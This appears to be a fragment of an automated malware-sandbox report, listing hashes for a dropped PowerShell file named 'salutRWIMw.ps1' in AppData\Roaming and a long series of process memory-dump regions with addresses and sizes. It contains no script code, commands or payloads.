                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        19fd217a468db0bfc67c54b3b178610e1914bcdf

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        ce8981afecb84ec22a296d9feb90b2e0f3d92bd4903cb8d137654580e986900c

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        0e098a29f5b6d7d8189507b592635502ad18893c51bf904517b6e0b9e032e54bc4c2d281adf52ea469ff2a1e1b9ac57b157e0fd3666847fa38fce654ac6ffe14

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\salutRWIMw.ps1

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        349B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        28e4eda7451c625bbe806b745753f729

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d29e9b2c2ac5b10188cbae92cffba6827728543d

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

                                                                                                                                                                                                                      • memory/1500-735-0x00007FFE223E0000-0x00007FFE22EA1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/1500-729-0x00007FFE223E0000-0x00007FFE22EA1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/1500-730-0x0000025AA87E0000-0x0000025AA87F0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/1500-731-0x0000025AA87E0000-0x0000025AA87F0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/1500-732-0x0000025AA87E0000-0x0000025AA87F0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/1588-699-0x00007FFE223E0000-0x00007FFE22EA1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/1588-711-0x00000184A8CE0000-0x00000184A8CF0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/1588-710-0x00000184A8CE0000-0x00000184A8CF0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/1588-709-0x00000184A8EF0000-0x00000184A8F12000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                      • memory/1588-716-0x00007FFE223E0000-0x00007FFE22EA1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/1588-712-0x00000184A8CE0000-0x00000184A8CF0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/2544-670-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-684-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-676-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-651-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-672-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-650-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-679-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-653-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-668-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2544-671-0x0000021A41D00000-0x0000021A41D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2892-674-0x00007FFE42C20000-0x00007FFE42C21000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5308-928-0x000002C4980B0000-0x000002C4980C0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/5308-915-0x00007FFE259B0000-0x00007FFE26471000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/5308-916-0x000002C4980B0000-0x000002C4980C0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/5308-930-0x00007FFE259B0000-0x00007FFE26471000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/5308-917-0x000002C4980B0000-0x000002C4980C0000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/5372-913-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/5372-838-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/5372-822-0x00000160F2230000-0x00000160F2240000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/5372-901-0x00000160F2230000-0x00000160F2240000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/6224-858-0x0000020DC1930000-0x0000020DC1940000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/6224-897-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/6224-863-0x0000020DC1930000-0x0000020DC1940000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/6224-857-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/6836-906-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/6836-878-0x00000253A0B00000-0x00000253A0B10000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/6836-877-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7208-1056-0x00007FFE259B0000-0x00007FFE26471000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7208-1058-0x000001A67E6F0000-0x000001A67E700000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7208-1057-0x000001A67E6F0000-0x000001A67E700000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7208-1063-0x00007FFE259B0000-0x00007FFE26471000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7804-905-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7804-898-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7804-819-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7804-875-0x0000026010B40000-0x0000026010B50000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7824-886-0x000002A1D1000000-0x000002A1D1010000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7824-885-0x000002A1D1000000-0x000002A1D1010000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7824-880-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7824-896-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7824-802-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7824-803-0x000002A1D1000000-0x000002A1D1010000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7824-804-0x000002A1D1000000-0x000002A1D1010000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7860-912-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7860-874-0x000002497EC10000-0x000002497EC20000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7860-832-0x00007FFE25900000-0x00007FFE263C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/7860-821-0x000002497EC10000-0x000002497EC20000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7860-820-0x000002497EC10000-0x000002497EC20000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                      • memory/7860-900-0x000002497EC10000-0x000002497EC20000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64KB